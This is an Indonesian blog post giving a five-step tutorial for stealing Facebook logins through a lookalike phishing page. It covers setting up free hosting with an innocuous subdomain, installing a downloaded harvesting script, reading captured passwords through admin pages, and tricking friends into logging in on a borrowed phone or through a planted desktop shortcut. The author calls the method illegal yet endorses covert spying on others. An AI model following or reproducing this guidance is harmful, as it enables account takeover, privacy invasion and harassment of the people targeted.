Minggu, 03 September 2017

Cara Hack Facebook Dengan Mudah

Cara Hack Facebook Dengan Mudah



Halo sobat JCFT,
gimana kabar kalian ?
disini saya membuat artikel tentang apa yang kalian inginkan seumur hidup kalian,
kalau ditanya pengen bisa hek apa mesti jawab kalian paling pertama hek Facebook kan ?
dari dulu saya bosan mendengar gimana sih cara hack facebook?
karena saya berfikir apa yang akan kalian lakukan setelah mendapatkannya? dan pikir saya pertama kali yang bertanya pasti bocah, dan pasti mau aneh-aneh in akun orang.

tapi tadi saya sempat SEO dan saya menemukan dari 100 kata kunci google, 5 diantaranya adalah "Bagaimana cara hack facebook" atau "Cara hack facebook" dari sinilah saya berfikir kenapa sebanyak itu?

dan jawabannya adalah (Masalah)

iya memang jawabannya masalah, kenapa?
karena diantara orang kebanyakan dalam arti tak semuanya, tapi rata-rata setelah mereka bermusuhan biasanya menginginkan dari orang yang dia benci tersebut salah satu asetnya.
dan yang paling berharga yang anda miliki adalah akun facebook kan ?

bisa anda tidak facebook an seminggu ?
meski anda sibuk, kalau mengetahui Facebook anda di hack setelah kesibukan itu pasti pusing 7 keliling yakan ? berarti berharga yah sobat.
kalau saya sih iya.

dan enggak sedikit dari teman kalian baik 17th sampai 25th kalau putus pasti deh ngincer Facebooknya apalagi yang 17th kebawah huh membludak itu mah.

Tapi admin mengingatkan, Ini cara 100% ilegal dan kalau dapat korban jangan sesekali bertindak bodoh seperti merusak nama baik korban, menyebar fitnah dengan akun korban, dll yang menggunakan bukan hak milik kalian, karena kalian bisa saja terjerat UUD ITE tentang penyalahgunaan.
Tapi kalau kalian mendapatkan akun hanya untuk mengawasi, untuk akun yang jadi like FP kalian itu boleh. asal tidak ketahuan hehe.

Berikut ini adalah website hack facebook milik saya,
id-id-facebook.rf.gd
maaf yang versi web belum/gapernah saya update jadi kusam, dan juga saya lupa id+password cpanel saya haha gubrak..
tapi tenang saya ingat login untuk cek korban.

Oke langsung saja,
"Hanya 5 Langkah, Anda Bisa Menjadi Hacker"

Disini kita menggunakan teknik Social Engineering.
apa itu Social Engineering?.
Baca Selengkapnya : Apa Itu Social Engineering ?


Pertama,
Sobat harus punya cpanel dulu dan tidak harus mahal, gratisan / subdomain juga boleh. (Script ini terbukti tidak terdeteksi alias aman pada system cpanel)
usahakan membuat yang tak mencurigakan, contoh seperti subdomain saya diatas.
boleh kalian kembangkan jadi tidak terpaku hanya pada halaman muka facebook saja (Kalau tidak bisa edit mending jangan nanti Error malah suspend CPanelnya)

Kedua,
Sobat download script semuanya KLIK DISINI
Setelah semua sobat download kemudian ekstract semuanya.

Ketiga,
Kemudian edit script sobat tadi agar aman tak dicuri orang lain pada data kalian, maka edit script dan masukan USERNAME dan PASSWORD yang kalian inginkan di :

  1. Setoran/Facebook.php

NB: User dan Pass diatas bukanlah untuk login namun untuk mencegah seseorang asing mencoba mengakses Facebook.php karena disitulah data semua korban kalian.
apabila sudah kalian edit Username dan Password. maka tahap berikutnya adalah upload ke website/Cpanel sobat.


Keempat,
Kemudian sobat diharuskan untuk membuat password untuk kalian gunakan login dan berfungsi untuk melihat semua korban sobat yang masuk kedalam jebakan sobat.
Caranya :
Alamat_Website_Sobat/hacker.php
Contoh :
www.Facebook.com/hacker.php

sampai step ini kalian sudah membuat bahan untuk meng-hack korban dan hanya perlu langkah terakhir untuk mengakhiri "Cara Hack Facebook Dengan Mudah"


Baca Juga : Cara Hack Dan Mengontrol Android Menggunakan Droid Jack


Kalima,
Kalau sobat pandai ngibul atau semacamnya. Sobat pasti akan mendapat banyak akun. bahkan ratusan kalau sobat mau.
Ini adalah pengalaman saya dalam mendapatkan korban dan mungkin kalian bisa mengembangkan menjadi banyak cara daripada saya,

1. Untuk Target kalian pengguna HandPhone
Coba kalian meminjam HP teman kalian tersebut yang mau dijadikan korban dan coba bilang " Bro, pinjem HP aku mau cek pesan dari temen-temenku karena lama gak Facebookan dari kemarin gada kuota" dan otomatis dia merasa mau pelit tapi iba wkwk. NB: Usahakan teman kalian disamping kalian sedang internetan, soalnya percuma kalo sama-sama tidak ada kuota kan gak lucu.

  • Kemudian akses alamat web sobat yang kalian buat diatas.
  • Pura-pura aja ngetik sesuatu, hapus semua tulisan email-password sobat(Karena sobat kan mau jebak dia bukan sobat sendiri ya), saat sudah cukup lama sekitar 15 detik seperti pura-pura nunggu loading.
  • kemudian bilang ke-dia "Wah, bro facebook gw kok gabisa login yah.? masak akun gw salah". Jangan bilang dulu coba akun punya kamu bro. biar dia yang bilang sendiri mau coba. kalo dia ngejek haha pasti ke hek akun lu. baru deh kalian bilang coba akun kamu pasti juga gabis. jadi nunggu time yang tepat aja. 


2. Untuk Target kalian menggunakan Komputer
Sobat bisa gunakan teknik ini : Cara Membuat Shortcut Website Pada Notepad

Kemudian taruh di desktop PC korban, bisa juga warnet, atau siapapun

itulah beberapa 2 teknik yang saya pakai, kalau kalian mempunyai teknik selain saya boleh kok kalian kembangkan melalui apa saja.


Cara Soceial Enginering merupakan teknik paling ampuh dan sampai-sampai teknik paling berbahaya dan jitu kemudian diangkatnya teknik ini menjadi TOP Teknique Hacker yah ini Social Enginering.
Mudah bukan ? Tapi butuh ketrampilan mencari dan menjebak korban.
" Slowly But Deadly - Anonymous "

Pesan : 
  1. Jangan Lupa User-Password login,karena jika kalian membutuhkan hack facebook itu. maka kalian bisa menggunakannya kembali.
  2. Tetap jaga norma,perilaku,etika,hasrat,ego,dll sobat yang menyebabkan kalian menyalahgunakan milik orang lain
  3. Jangan lupa Share dan Subscribe untuk terus mengikuti hal terbaru dari Jokamp Cyber Fighter Team setiap harinya.



Tag Terkait :
  • Cara Hack Facebook
  • Cara Ngehack Facebook
  • Hack Facebook
  • How To Hack Facebook
  • Hack Facebook Dengan Mudah
  • Hack FB
  • Cara Hack FB Terbaru
  • Cara Hack FB orang lain
  • Hack FB orang lain
  • Hack Facebook Akun



PERLU DIKETAHUI


Iklan yang tampil pada halaman situs ini sepenuhnya sudah diatur oleh Pihak Google, kami hanya menyediakan tempat kosong khusus untuk iklan dari Google. Maka, apabila ada iklan yang dirasa kurang baik bagi anda sehingga tidak seharusnya ditampilkan, harap segera menginformasikan hal tersebut kepada kami dengan melalui Formulir Kontak yang ada di bagian bawah sendiri pada situs ini. Kemudian, kami akan segera menyampaikannya pada pihak Google terkait masalah tersebut.
Laporan dapat anda sertakan lampiran :
  • Nama Iklan
  • Alamat Screenshoot(Gambar) Iklan


Load Disqus Comments Hide Disqus Comments